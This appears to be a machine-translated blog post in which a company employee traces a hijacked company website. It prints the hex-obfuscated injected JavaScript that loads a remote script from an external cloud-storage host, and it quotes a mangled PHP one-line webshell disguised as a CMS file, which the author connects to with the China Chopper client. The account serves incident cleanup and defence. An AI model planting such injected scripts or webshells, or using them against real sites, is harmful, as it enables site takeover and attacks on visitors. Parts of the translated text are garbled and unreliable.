Yesterday, the manager visited the company again, saying that the company's website was hung up.
Since I don't know how to infiltrate, I can only fool around.
Look at what is in the home page file.
The three most appalling labels are:
There is also a JS code, copied to Baidu, found that this code is basically appear on the black website, but I do not know what it is.
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74" [[\x77\x72\x69\x74\x65]] ('\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\ x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x66\x73\x66\x64\x73\x66\x2e\x6f\x73\x73\x2d\x63\x6e\x2d\x68\x6f\x6e\x67\x6b\x6f\x6e\x67\x2e\x61\x6c\x69\x79\x75\x6e\x63\x73\x2e\x63\x6f\x6d\x2f\x31\x39\x30\x30\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');
The 16 decimal encoding, roughly converting the Unicode code, is the result of:
If you look at it, it may be the return value of the JS file on the page.
At the bottom of the page, you find a bunch of things that are linked to the PHP file.
Then I looked at the sanctity of these PHP documents.
But they found that the files were the same, but the names were different. Probably look at the PHP code again, meaning that it should read the contents and output of the Reads address that is passed to the custom method.
Then I decisively opened the address, but because the company's website was too dark for a long time, it was found that the address was also very unfortunate 404.
Check through logs
Knowing where the web page is hung up, you have to find out how it has been granted permission.
First of all, it is impossible to guess the FTP password. The FTP password of all the websites of the company is randomly generated to mix the uppercase and the lowercase numbers.
Then downloaded all the access logs of the website, but it was too long to get it.
Next, I want to go back to the background to check the operation log, but I find that the background is written by the predecessors of my company. It is not perfect at all, let alone the operation log.
True no solution
How about a safe dog?
Since you don't have the ability to do that, check with the software where the back door is.
Let's take a look at the website security dog: http://free.safedog.cn/website_safedog.html
@ @ @ remember to pay for the security dog advertising fee.
After downloading all the files on the website, a lot of horses were found.
Because in the past, he also used a Trojan horse to play a simple invasion, so he randomly opened second scanning results, but really confirmed the look!!!
Next, the Trojan file was opened. The whole file was exposed only by two lines of code, and all the other code was annotated (just to disguise itself as a dream weaving CMS file).
Copy these two pieces of code to Baidu to see what this is.
$a=range (1200); $b=chr ($a).Chr ($a).Chr ($a).Chr ($a).Chr ($a).Chr;
Indeed, it is indeed a word to miss. After Baidu knows this sentence, the Trojan horse's password is 4.
Well, now that I know a sentence, I will try to use some of the past trivial things and add the legendary Chinese kitchen knife.
Sure enough to connect and get all the rights of the website.
To be continued
There are too many things to say about infiltration, and the most important thing is to do a good job of website security protection. To check out the security holes and Trojan documents, your partners should be deleted in time, so that there will be no opportunity for bad corn!!!
As for the company website vulnerabilities... Emmmmm... Still looking for